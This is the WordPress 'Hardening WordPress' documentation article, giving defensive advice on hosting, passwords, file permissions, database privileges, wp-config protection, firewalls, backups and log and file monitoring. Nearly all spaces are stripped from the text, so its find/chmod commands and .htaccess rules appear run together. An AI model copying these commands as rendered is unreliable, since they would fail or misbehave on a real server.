Hardening WordPress – WordPress.org Forums

Like many modern software packages, WordPress is updated regularly to address new security issues that may arise. Improving software security is always an ... Skiptocontent AboutWordPressAboutWordPressWordPress.orgDocumentationSupportFeedbackSearchLogInRegister Skiptocontent Categories TopicsWhatisSecurity? SecurityThemes VulnerabilitiesonYourComputer VulnerabilitiesinWordPress UpdatingWordPress ReportingSecurityIssues WebServerVulnerabilities NetworkVulnerabilities Passwords FTP FilePermissions Changingfilepermissions RegardingAutomaticUpdates DatabaseSecurity RestrictingDatabaseUserPrivileges Securingwp-admin Securingwp-includes Securingwp-config.php DisableFileEditing Plugins Firewall Pluginsthatneedwriteaccess Codeexecutionplugins Securitythroughobscurity DataBackups Logging Monitoring Monitoringyourlogs Monitoringyourfilesforchanges Goals Generalapproaches Specifictools Considerations Monitoringyourwebserverexternally Resources SeeAlso SecurityinWordPressistakenveryseriously,butaswithanyothersystemtherearepotentialsecurityissuesthatmayariseifsomebasicsecurityprecautionsaren’ttaken.Thisarticlewillgothroughsomecommonformsofvulnerabilities,andthethingsyoucandotohelpkeepyourWordPressinstallationsecure. Thisarticleisnottheultimatequickfixtoyoursecurityconcerns.Ifyouhavespecificsecurityconcernsordoubts,youshoulddiscussthemwithpeoplewhomyoutrusttohavesufficientknowledgeofcomputersecurityandWordPress. WhatisSecurity? Fundamentally,securityisnotaboutperfectlysecuresystems.Suchathingmightwellbeimpractical,orimpossibletofindand/ormaintain.Whatsecurityisthoughisriskreduction,notriskelimination.It’saboutemployingalltheappropriatecontrolsavailabletoyou,withinreason,thatallowyoutoimproveyouroverallposturereducingtheoddsofmakingyourselfatarget,subsequentlygettinghacked. WebsiteHosts Often,agoodplacetostartwhenitcomestowebsitesecurityisyourhostingenvironment.Today,thereareanumberofoptionsavailabletoyou,andwhilehostsoffersecuritytoacertainlevel,it’simportanttounderstandwheretheirresponsibilityendsandyoursbegins.Hereisagoodarticleexplainingthecomplicateddynamicbetweenwebhostsandthesecurityofyourwebsite.Asecureserverprotectstheprivacy,integrity,andavailabilityoftheresourcesundertheserveradministrator’scontrol. Qualitiesofatrustedwebhostmightinclude: Readilydiscussesyoursecurityconcernsandwhichsecurityfeaturesandprocessestheyofferwiththeirhosting.Providesthemostrecentstableversionsofallserversoftware.Providesreliablemethodsforbackupandrecovery. Decidewhichsecurityyouneedonyourserverbydeterminingthesoftwareanddatathatneedstobesecured.Therestofthisguidewillhelpyouwiththis. WebsiteApplications It’seasytolookatwebhostsandpasstheresponsibilityofsecuritytothem,butthereisatremendousamountofsecuritythatliesonthewebsiteowneraswell.Webhostsareoftenresponsiblefortheinfrastructureonwhichyourwebsitesits,theyarenotresponsiblefortheapplicationyouchoosetoinstall. Tounderstandwhereandwhythisisimportantyoumustunderstandhowwebsitesgethacked,Rarelyisitattributedtotheinfrastructure,andmostoftenattributedtotheapplicationitself(i.e.,theenvironmentyouareresponsiblefor). Top↑SecurityThemes Keepinmindsomegeneralideaswhileconsideringsecurityforeachaspectofyoursystem: Limitingaccess Makingsmartchoicesthatreducepossibleentrypointsavailabletoamaliciousperson. Containment Yoursystemshouldbeconfiguredtominimizetheamountofdamagethatcanbedoneintheeventthatitiscompromised. Preparationandknowledge KeepingbackupsandknowingthestateofyourWordPressinstallationatregularintervals.Havingaplantobackupandrecoveryourinstallationinthecaseofcatastrophecanhelpyougetbackonlinefasterinthecaseofaproblem. TrustedSources Donotgetplugins/themesfromuntrustedsources.RestrictyourselftotheWordPress.orgrepositoryorwellknowncompanies.Tryingtogetplugins/themesfromtheoutsidemayleadtoissues. Top↑VulnerabilitiesonYourComputer Makesurethecomputersyouusearefreeofspyware,malware,andvirusinfections.NoamountofsecurityinWordPressoronyourwebserverwillmaketheslightestdifferenceifthereisakeyloggeronyourcomputer. Alwayskeepyouroperatingsystemandthesoftwareonit,especiallyyourwebbrowser,uptodatetoprotectyoufromsecurityvulnerabilities.Ifyouarebrowsinguntrustedsites,wealsorecommendusingtoolslikeno-script(ordisablingjavascript/flash/java)inyourbrowser. Top↑VulnerabilitiesinWordPress Likemanymodernsoftwarepackages,WordPressisupdatedregularlytoaddressnewsecurityissuesthatmayarise.Improvingsoftwaresecurityisalwaysanongoingconcern,andtothatendyoushouldalwayskeepuptodatewiththelatestversionofWordPress.OlderversionsofWordPressarenotmaintainedwithsecurityupdates. Top↑UpdatingWordPress Mainarticle:UpdatingWordPress. ThelatestversionofWordPressisalwaysavailablefromthemainWordPresswebsiteathttps://wordpress.org.Officialreleasesarenotavailablefromothersites—neverdownloadorinstallWordPressfromanywebsiteotherthanhttps://wordpress.org. Sinceversion3.7,WordPresshasfeaturedautomaticupdates.Usethisfunctionalitytoeasetheprocessofkeepinguptodate.YoucanalsousetheWordPressDashboardtokeepinformedaboutupdates.ReadtheentryintheDashboardortheWordPressDeveloperBlogtodeterminewhatstepsyoumusttaketoupdateandremainsecure. IfavulnerabilityisdiscoveredinWordPressandanewversionisreleasedtoaddresstheissue,theinformationrequiredtoexploitthevulnerabilityisalmostcertainlyinthepublicdomain.Thismakesoldversionsmoreopentoattack,andisoneoftheprimaryreasonsyoushouldalwayskeepWordPressuptodate. IfyouareanadministratorinchargeofmorethanoneWordPressinstallation,considerusingSubversiontomakemanagementeasier. Top↑ReportingSecurityIssues IfyouthinkyouhavefoundasecurityflawinWordPress,youcanhelpbyreportingtheissue.SeetheSecurityFAQforinformationonhowtoreportsecurityissues. Ifyouthinkyouhavefoundabug,reportit.SeeSubmittingBugsforhowtodothis.Youmighthaveuncoveredavulnerability,orabugthatcouldleadtoone. Top↑WebServerVulnerabilities ThewebserverrunningWordPress,andthesoftwareonit,canhavevulnerabilities.Therefore,makesureyouarerunningsecure,stableversionsofyourwebserverandthesoftwareonit,ormakesureyouareusingatrustedhostthattakescareofthesethingsforyou. Ifyou’reonasharedserver(onethathostsotherwebsitesbesidesyourown)andawebsiteonthesameserveriscompromised,yourwebsitecanpotentiallybecompromisedtooevenifyoufolloweverythinginthisguide.Besuretoaskyourwebhostwhatsecurityprecautionstheytake. Top↑NetworkVulnerabilities Thenetworkonbothends—theWordPressserversideandtheclientnetworkside—shouldbetrusted.Thatmeansupdatingfirewallrulesonyourhomerouterandbeingcarefulaboutwhatnetworksyouworkfrom.AnInternetcafewhereyouaresendingpasswordsoveranunencryptedconnection,wirelessorotherwise,isnotatrustednetwork. Yourwebhostshouldbemakingsurethattheirnetworkisnotcompromisedbyattackers,andyoushoulddothesame.Networkvulnerabilitiescanallowpasswordsandothersensitiveinformationtobeintercepted. Top↑Passwords Manypotentialvulnerabilitiescanbeavoidedwithgoodsecurityhabits.Astrongpasswordisanimportantaspectofthis. Thegoalwithyourpasswordistomakeithardforotherpeopletoguessandhardforabruteforceattacktosucceed.Manyautomaticpasswordgeneratorsareavailablethatcanbeusedtocreatesecurepasswords. WordPressalsofeaturesapasswordstrengthmeterwhichisshownwhenchangingyourpasswordinWordPress.Usethiswhenchangingyourpasswordtoensureitsstrengthisadequate. Thingstoavoidwhenchoosingapassword: Anypermutationofyourownrealname,username,companyname,ornameofyourwebsite.Awordfromadictionary,inanylanguage.Ashortpassword.Anynumeric-onlyoralphabetic-onlypassword(amixtureofbothisbest). Astrongpasswordisnecessarynotjusttoprotectyourblogcontent.Ahackerwhogainsaccesstoyouradministratoraccountisabletoinstallmaliciousscriptsthatcanpotentiallycompromiseyourentireserver. Inadditiontousingastrongpassword,it’sagoodideatoenabletwo-stepauthenticationasanadditionalsecuritymeasure. Top↑FTP WhenconnectingtoyourserveryoushoulduseSFTPencryptionifyourwebhostprovidesit.IfyouareunsureifyourwebhostprovidesSFTPornot,justaskthem. UsingSFTPisthesameasFTP,exceptyourpasswordandotherdataisencryptedasitistransmittedbetweenyourcomputerandyourwebsite.Thismeansyourpasswordisneversentintheclearandcannotbeinterceptedbyanattacker. Top↑FilePermissions SomeneatfeaturesofWordPresscomefromallowingvariousfilestobewritablebythewebserver.However,allowingwriteaccesstoyourfilesispotentiallydangerous,particularlyinasharedhostingenvironment. Itisbesttolockdownyourfilepermissionsasmuchaspossibleandtoloosenthoserestrictionsontheoccasionsthatyouneedtoallowwriteaccess,ortocreatespecificfolderswithlessrestrictionsforthepurposeofdoingthingslikeuploadingfiles. Hereisonepossiblepermissionscheme. Allfilesshouldbeownedbyyouruseraccount,andshouldbewritablebyyou.AnyfilethatneedswriteaccessfromWordPressshouldbewritablebythewebserver,ifyourhostingsetuprequiresit,thatmaymeanthosefilesneedtobegroup-ownedbytheuseraccountusedbythewebserverprocess. / TherootWordPressdirectory:allfilesshouldbewritableonlybyyouruseraccount,except.htaccessifyouwantWordPresstoautomaticallygeneraterewriterulesforyou. /wp-admin/ TheWordPressadministrationarea:allfilesshouldbewritableonlybyyouruseraccount. /wp-includes/ ThebulkofWordPressapplicationlogic:allfilesshouldbewritableonlybyyouruseraccount. /wp-content/ User-suppliedcontent:intendedtobewritablebyyouruseraccountandthewebserverprocess. Within/wp-content/youwillfind: /wp-content/themes/ Themefiles.Ifyouwanttousethebuilt-inthemeeditor,allfilesneedtobewritablebythewebserverprocess.Ifyoudonotwanttousethebuilt-inthemeeditor,allfilescanbewritableonlybyyouruseraccount. /wp-content/plugins/ Pluginfiles:allfilesshouldbewritableonlybyyouruseraccount. Otherdirectoriesthatmaybepresentwith/wp-content/shouldbedocumentedbywhicheverpluginorthemerequiresthem.Permissionsmayvary. Top↑Changingfilepermissions Ifyouhaveshellaccesstoyourserver,youcanchangefilepermissionsrecursivelywiththefollowingcommand: ForDirectories: find/path/to/your/wordpress/install/-typed-execchmod755{}\; ForFiles: find/path/to/your/wordpress/install/-typef-execchmod644{}\; Top↑RegardingAutomaticUpdates WhenyoutellWordPresstoperformanautomaticupdate,allfileoperationsareperformedastheuserthatownsthefiles,notasthewebserver’suser.Allfilesaresetto0644andalldirectoriesaresetto0755,andwritablebyonlytheuserandreadablebyeveryoneelse,includingthewebserver. Top↑DatabaseSecurity Ifyourunmultipleblogsonthesameserver,itiswisetoconsiderkeepingtheminseparatedatabaseseachmanagedbyadifferentuser.ThisisbestaccomplishedwhenperformingtheinitialWordPressinstallation.Thisisacontainmentstrategy:ifanintrudersuccessfullycracksoneWordPressinstallation,thismakesitthatmuchhardertoalteryourotherblogs. IfyouadministerMySQLyourself,ensurethatyouunderstandyourMySQLconfigurationandthatunneededfeatures(suchasacceptingremoteTCPconnections)aredisabled.SeeSecureMySQLDatabaseDesignforaniceintroduction. Top↑RestrictingDatabaseUserPrivileges FornormalWordPressoperations,suchaspostingblogposts,uploadingmediafiles,postingcomments,creatingnewWordPressusersandinstallingWordPressplugins,theMySQLdatabaseuseronlyneedsdatareadanddatawriteprivilegestotheMySQLdatabase;SELECT,INSERT,UPDATEandDELETE. Thereforeanyotherdatabasestructureandadministrationprivileges,suchasDROP,ALTERandGRANTcanberevoked.Byrevokingsuchprivilegesyouarealsoimprovingthecontainmentpolicies. Note:Someplugins,themesandmajorWordPressupdatesmightrequiretomakedatabasestructuralchanges,suchasaddnewtablesorchangetheschema.Insuchcase,beforeinstallingthepluginorupdatingasoftware,youwillneedtotemporarilyallowthedatabaseusertherequiredprivileges. WARNING:Attemptingupdateswithouthavingtheseprivilegescancauseproblemswhendatabaseschemachangesoccur.Thus,itisNOTrecommendedtorevoketheseprivileges.Ifyoudofeeltheneedtodothisforsecurityreasons,thenpleasemakesurethatyouhaveasolidbackupplaninplacefirst,withregularwholedatabasebackupswhichyouhavetestedarevalidandthatcanbeeasilyrestored.Afaileddatabaseupgradecanusuallybesolvedbyrestoringthedatabasebacktoanoldversion,grantingtheproperpermissions,andthenlettingWordPresstrythedatabaseupdateagain.RestoringthedatabasewillreturnitbacktothatoldversionandtheWordPressadministrationscreenswillthendetecttheoldversionandallowyoutorunthenecessarySQLcommandsonit.MostWordPressupgradesdonotchangetheschema,butsomedo.Onlymajorpointupgrades(3.7to3.8,forexample)willaltertheschema.Minorupgrades(3.8to3.8.1)willgenerallynot.Nevertheless,keeparegularbackup. Top↑Securingwp-admin Addingserver-sidepasswordprotection(suchasBasicAuth)to/wp-admin/addsasecondlayerofprotectionaroundyourblog’sadminarea,theloginscreen,andyourfiles.Thisforcesanattackerorbottoattackthissecondlayerofprotectioninsteadofyouractualadminfiles.ManyWordPressattacksarecarriedoutautonomouslybymalicioussoftwarebots. Simplysecuringthewp-admin/directorymightalsobreaksomeWordPressfunctionality,suchastheAJAXhandleratwp-admin/admin-ajax.php.SeetheResourcessectionformoredocumentationonhowtopasswordprotectyourwp-admin/directoryproperly. ThemostcommonattacksagainstaWordPressblogusuallyfallintotwocategories. Sendingspecially-craftedHTTPrequeststoyourserverwithspecificexploitpayloadsforspecificvulnerabilities.Theseincludeold/outdatedpluginsandsoftware.Attemptingtogainaccesstoyourblogbyusing“brute-force”passwordguessing. Theultimateimplementationofthis“secondlayer”passwordprotectionistorequireanHTTPSSSLencryptedconnectionforadministration,sothatallcommunicationandsensitivedataisencrypted.SeeAdministrationOverSSL. Top↑Securingwp-includes Asecondlayerofprotectioncanbeaddedwherescriptsaregenerallynotintendedtobeaccessedbyanyuser.Onewaytodothatistoblockthosescriptsusingmod_rewriteinthe.htaccessfile.Note:toensurethecodebelowisnotoverwrittenbyWordPress,placeitoutsidethe#BEGINWordPressand#ENDWordPresstagsinthe.htaccessfile.WordPresscanoverwriteanythingbetweenthesetags. #Blocktheinclude-onlyfiles. RewriteEngineOn RewriteBase/ RewriteRule^wp-admin/includes/-[F,L] RewriteRule!^wp-includes/-[S=3] RewriteRule^wp-includes/[^/]+\.php$-[F,L] RewriteRule^wp-includes/js/tinymce/langs/.+\.php-[F,L] RewriteRule^wp-includes/theme-compat/-[F,L] #BEGINWordPress Notethatthiswon’tworkwellonMultisite,asRewriteRule^wp-includes/[^/]+\.php$-[F,L]wouldpreventthems-files.phpfilefromgeneratingimages.Omittingthatlinewillallowthecodetowork,butofferslesssecurity. Top↑Securingwp-config.php Youcanmovethewp-config.phpfiletothedirectoryaboveyourWordPressinstall.Thismeansforasiteinstalledintherootofyourwebspace,youcanstorewp-config.phpoutsidetheweb-rootfolder. Note:Somepeopleassertthatmovingwp-config.phphasminimalsecuritybenefitsand,ifnotdonecarefully,mayactuallyintroduceseriousvulnerabilities.Othersdisagree. Notethatwp-config.phpcanbestoredONEdirectorylevelabovetheWordPress(wherewp-includesresides)installation.Also,makesurethatonlyyou(andthewebserver)canreadthisfile(itgenerallymeansa400or440permission). Ifyouuseaserverwith.htaccess,youcanputthisinthatfile(attheverytop)todenyaccesstoanyonesurfingforit: orderallow,deny denyfromall Top↑DisableFileEditing TheWordPressDashboardbydefaultallowsadministratorstoeditPHPfiles,suchaspluginandthemefiles.Thisisoftenthefirsttoolanattackerwilluseifabletologin,sinceitallowscodeexecution.WordPresshasaconstanttodisableeditingfromDashboard.Placingthislineinwp-config.phpisequivalenttoremovingthe‘edit_themes’,‘edit_plugins’and‘edit_files’capabilitiesofallusers: define('DISALLOW_FILE_EDIT',true); Thiswillnotpreventanattackerfromuploadingmaliciousfilestoyoursite,butmightstopsomeattacks. Top↑Plugins Firstofall,makesureyourpluginsarealwaysupdated.Also,ifyouarenotusingaspecificplugin,deleteitfromthesystem. Top↑Firewall Therearemanypluginsandservicesthatcanactasafirewallforyourwebsite.Someofthemworkbymodifyingyour.htaccess fileandrestrictingsomeaccessattheApachelevel,beforeitisprocessedbyWordPress.AgoodexampleisiThemesSecurityorAllinOneWPSecurity.SomefirewallpluginsactattheWordPresslevel,likeWordFenceandShield,andtrytofilterattacksasWordPressisloading,butbeforeitisfullyprocessed. Besidesplugins,youcanalsoinstallaWAF(webfirewall)atyourwebservertofiltercontentbeforeitisprocessedbyWordPress.ThemostpopularopensourceWAFisModSecurity. Awebsitefirewallcanalsobeaddedasintermediarybetweenthetrafficfromtheinternetandyourhostingserver.Theseservicesallfunctionasreverseproxies,inwhichtheyaccepttheinitialrequestsandreroutethemtoyourserver,strippingitofallmaliciousrequests.TheyaccomplishthisbymodifyingyourDNSrecords,viaanArecordorfullDNSswap,allowingalltraffictopassthroughthenewnetworkfirst.Thiscausesalltraffictobefilteredbythefirewallbeforereachingyoursite.Afewcompaniesoffersuchservice,likeCloudFlare,SucuriandIncapsula. Additionally,thesethirdpartiesserviceprovidersfunctionasContentDistributionNetwork(CDNs)bydefault,introducingperformanceoptimizationandglobalreach. Top↑Pluginsthatneedwriteaccess IfapluginwantswriteaccesstoyourWordPressfilesanddirectories,pleasereadthecodetomakesureitislegitorcheckwithsomeoneyoutrust.PossibleplacestocheckaretheSupportForumsandIRCChannel. Top↑Codeexecutionplugins Aswesaid,partofthegoalofhardeningWordPressiscontainingthedamagedoneifthereisasuccessfulattack.PluginswhichallowarbitraryPHPorothercodetoexecutefromentriesinadatabaseeffectivelymagnifythepossibilityofdamageintheeventofasuccessfulattack. Awaytoavoidusingsuchapluginistousecustompagetemplatesthatcallthefunction.PartofthesecuritythisaffordsisactiveonlywhenyoudisallowfileeditingwithinWordPress. Top↑Securitythroughobscurity Securitythroughobscurityisgenerallyanunsoundprimarystrategy.However,thereareareasinWordPresswhereobscuringinformationmighthelpwithsecurity: Renametheadministrativeaccount:Whencreatinganadministrativeaccount,avoideasilyguessedtermssuchasadminorwebmasterasusernamesbecausetheyaretypicallysubjecttoattacksfirst.OnanexistingWordPressinstallyoumayrenametheexistingaccountintheMySQLcommand-lineclientwithacommandlikeUPDATEwp_usersSETuser_login='newuser'WHEREuser_login='admin';,orbyusingaMySQLfrontendlikephpMyAdmin.Changethetable_prefix:ManypublishedWordPress-specificSQL-injectionattacksmaketheassumptionthatthetable_prefixiswp_,thedefault.ChangingthiscanblockatleastsomeSQLinjectionattacks. Top↑DataBackups Backupyourdataregularly,includingyourMySQLdatabases.Seethemainarticle:BackingUpYourDatabase. Dataintegrityiscriticalfortrustedbackups.Encryptingthebackup,keepinganindependentrecordofMD5hashesforeachbackupfile,and/orplacingbackupsonread-onlymediaincreasesyourconfidencethatyourdatahasnotbeentamperedwith. Asoundbackupstrategycouldincludekeepingasetofregularly-timedsnapshotsofyourentireWordPressinstallation(includingWordPresscorefilesandyourdatabase)inatrustedlocation.Imagineasitethatmakesweeklysnapshots.SuchastrategymeansthatifasiteiscompromisedonMay1stbutthecompromiseisnotdetecteduntilMay12th,thesiteownerwillhavepre-compromisebackupsthatcanhelpinrebuildingthesiteandpossiblyevenpost-compromisebackupswhichwillaidindetermininghowthesitewascompromised. Top↑Logging Logsareyourbestfriendwhenitcomestounderstandingwhatishappeningwithyourwebsite,especiallyifyou’retryingtoperformforensics.Contrarytopopularbeliefs,logsallowyoutoseewhatwasdoneandbywhoandwhen.Unfortunatelythelogswillnottellyouwho,username,loggedin,butitwillallowyoutoidentifytheIPandtimeandmoreimportantly,theactionstheattackermighthavetaken.Youwillbeabletoseeanyoftheseattacksviathelogs–CrossSiteScripting(XSS),RemoteFileInclusion(RFI),LocalFileInclusion(LFI)andDirectoryTraversalattempts.Youwillalsobeabletoseebruteforceattempts.Therearevariousexamplesandtutorialsavailabletohelpguideyouthroughtheprocessofparsingandanalyzingyourrawlogs. Ifyougetmorecomfortablewithyourlogsyou’llbeabletoseethingslike,whenthethemeandplugineditorsarebeingused,whensomeoneupdatesyourwidgetsandwhenpostsandpagesareadded.Allkeyelementswhendoingforensicworkonyourwebserver.TheareafewWordPressSecuritypluginsthatassistyouwiththisaswell,liketheSucuriAuditingtoolortheAuditTrailplugin. Therearetwokeyopen-sourcesolutionsyou’llwantonyourwebserverfromasecurityperspective,thisisalayeredapproachtosecurity. OSSECcanrunonanyNIXdistributionandwillalsorunonWindows.Whenconfiguredcorrectlyitsverypowerful.Theideaiscorrelateandaggregateallthelogs.Youhavetobesuretoconfigureittocaptureallaccess_logsanderror_logsandifyouhavemultiplewebsitesontheserveraccountforthat.You’llalsowanttobesuretofilteroutthenoise.Bydefaultyou’llseealotofnoiseandyou’llwanttoconfigureittobereallyeffective. Top↑Monitoring Sometimespreventionisnotenoughandyoumaystillbehacked.That’swhyintrusiondetection/monitoringisveryimportant.Itwillallowyoutoreactfaster,findoutwhathappenedandrecoveryoursite. Top↑Monitoringyourlogs Ifyouareonadedicatedorvirtualprivateserver,inwhichyouhavetheluxuryofrootaccess,youhavetheabilityeasilyconfigurethingssothatyoucanseewhat’sgoingon.OSSECeasilyfacilitatesthisandhereisalittlewriteupthatmighthelpyououtOSSECforWebsiteSecurity–PartI. Top↑Monitoringyourfilesforchanges Whenanattackhappens,italwaysleavetraces.Eitheronthelogsoronthefilesystem(newfiles,modifiedfiles,etc).IfyouareusingOSSECforexample,itwillmonitoryourfilesandalertyouwhentheychange. Top↑Goals Thegoalsoffilesystemtrackinginclude: MonitorchangedandaddedfilesLogchangesandadditionsAbilitytorevertgranularchangesAutomatedalerts Top↑Generalapproaches Administratorscanmonitorfilesystemviageneraltechnologiessuchas: SystemutilitiesRevisioncontrolOS/kernellevelmonitoring Top↑Specifictools Optionsforfilesystemmonitoringinclude: diff–buildcleantestcopyofyoursiteandcompareagainstproductionGit–sourcecodemanagementinotifyandincron–OSkernellevelfilemonitoringservicethatcanruncommandsonfilesystemeventsWatcher–PythoninotifylibraryOSSEC–OpenSourceHost-basedIntrusionDetectionSystemthatperformsloganalysis,fileintegritychecking,policymonitoring,rootkitdetection,real-timealertingandactiveresponse. Top↑Considerations Whenconfiguringafilebasedmonitoringstrategy,therearemanyconsiderations,includingthefollowing. Runthemonitoringscript/serviceasroot Thiswouldmakeithardforattackerstodisableormodifyyourfilesystemmonitoringsolution. Disablemonitoringduringscheduledmaintenance/upgrades Thiswouldpreventunnecessarynotificationswhenyouareperformingregularmaintenanceonthesite. Monitoronlyexecutablefiletypes Itmaybereasonablysafetomonitoronlyexecutablefiletypes,suchas.phpfiles,etc..Filteringoutnon-executablefilesmayreduceunnecessarylogentriesandalerts. Usestrictfilesystempermissions Readaboutsecuringfilepermissionsandownership.Ingeneral,avoidallowingexecuteandwritepermissionstotheextentpossible. Top↑Monitoringyourwebserverexternally Iftheattackertriestodefaceyoursiteoraddmalware,youcanalsodetectthesechangesbyusingaweb-basedintegritymonitorsolution.Thiscomesinmanyformstoday,useyourfavoritesearchengineandlookforWebMalwareDetectionandRemediationandyou’lllikelygetalonglistofserviceproviders. Top↑Resources HowtoImproveWordPressSecurity(Infographic)SecurityPluginsWordPressSecurityCuttingThroughtheBSe-Book:LockingDownWordPresswpsecure.nethasafewguidesonhowtolockdownWordPress.ABeginnersGuidetoHardeningWordPressBradWilliams:LockitUp(Video)21WaystoSecureYourWordPressSiteOfficialdocsonhowtopasswordprotectdirectorieswithan.htaccessfileSimpletutorialonhowtopasswordprotecttheWordPressadminareaandfixthe404error Top↑SeeAlso SecurityFAQFAQ–MysitewashackedBruteForceAttacksWordPressSecurityWhitepaper Wasthisarticlehelpful?Howcoulditbeimproved?Youmustbeloggedintosubmitfeedback.